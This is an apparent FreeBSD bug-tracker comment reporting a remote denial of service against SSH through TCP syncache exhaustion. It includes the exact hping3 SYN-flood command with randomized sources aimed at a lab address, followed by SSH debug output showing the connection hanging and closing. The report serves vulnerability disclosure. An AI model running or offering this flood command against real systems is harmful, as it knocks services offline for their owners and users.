[Bug 294623] Remote Denial of Service via TCP Syncache Exhaustion Global Syncache Attack with Severe Impact on SSH
Date: Sat, 18 Apr 2026 21:59:04 UTC
https://bugs.freebsd.org/bugzilla/show_bug.cgi?id=294623 --- Comment #2 from Igor Gabriel S. Souza <igor@bsdtrust.com> --- In my tests, I ran "hping3 -S -p 22 --flood --rand-source -d 32 192.168.202.110" once and got an unusable terminal. When I ran two instances of "hping3 -S -p 22 --flood --rand-source -d 32 192.168.202.110" together, I obtained the following output: [18:38:44.317] debug1: compat_banner: match: OpenSSH_10.0 FreeBSD-20250801 pat OpenSSH* compat 0x04000000 [18:38:44.318] debug1: Authenticating to 192.168.202.110:22 as 'igor' [18:38:44.319] debug1: load_hostkeys: fopen /home/ig0r/.ssh/known_hosts2: No such file or directory [18:38:44.320] debug1: load_hostkeys: fopen /etc/ssh/ssh_known_hosts: No such file or directory [18:38:44.321] debug1: load_hostkeys: fopen /etc/ssh/ssh_known_hosts2: No such file or directory [18:38:44.322] debug1: SSH2_MSG_KEXINIT sent [18:38:44.351] debug1: SSH2_MSG_KEXINIT received [18:38:44.352] debug1: kex: algorithm: sntrup761x25519-sha512@openssh.com [18:38:44.353] debug1: kex: host key algorithm: ssh-ed25519 [18:38:44.354] debug1: kex: server->client cipher: chacha20-poly1305@openssh.com MAC: <implicit> compression: none [18:38:44.355] debug1: kex: client->server cipher: chacha20-poly1305@openssh.com MAC: <implicit> compression: none [18:38:44.384] debug1: expecting SSH2_MSG_KEX_ECDH_REPLY [18:40:47.700] Connection closed by 192.168.202.110 port 22 -- You are receiving this mail because: You are the assignee for the bug.